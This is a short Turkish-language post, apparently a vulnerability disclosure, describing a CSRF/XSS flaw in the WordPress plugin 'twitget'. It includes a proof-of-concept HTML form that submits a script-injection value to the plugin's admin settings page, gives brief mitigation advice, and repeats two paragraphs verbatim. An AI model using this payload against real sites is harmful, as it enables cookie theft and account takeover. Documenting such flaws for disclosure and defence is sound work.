Açık CSRF/XSS vulnerability dediğimiz yani kısaca cookie çalma ve kullanıcının her türlü bilgisini ele geçirme (facebook ve diğer hesaplarda dahil) yetkisine sahip olunabilir.
javascript alert yöntemi ile hata alınabilir ve işlemler devam edilebilir nitelikte.
Hatanın kapatılması: Hatayı kapatabilmeniz için yeni çıkan sürümü ile birlikte sayfa ayarlarınızı yada sitenizi ziyaretçilere kapatarak sadece üyelerin erişebilirliğini sağlayabilirsiniz.
PHP:
<form action=\"http://localhost/wp-admin/options-general.php?page=twitget/twitget.php\" method=\"POST\">
<input type=\"text\" name=\"twitget_username\" value=\"john_smith\">
<input type=\"text\" name=\"twitget_consumer_key\" value=\""><script>alert(\'dxw\')</script>\">
<input type=\"submit\">
</form>javascript alert yöntemi ile hata alınabilir ve işlemler devam edilebilir nitelikte.
Hatanın kapatılması: Hatayı kapatabilmeniz için yeni çıkan sürümü ile birlikte sayfa ayarlarınızı yada sitenizi ziyaretçilere kapatarak sadece üyelerin erişebilirliğini sağlayabilirsiniz.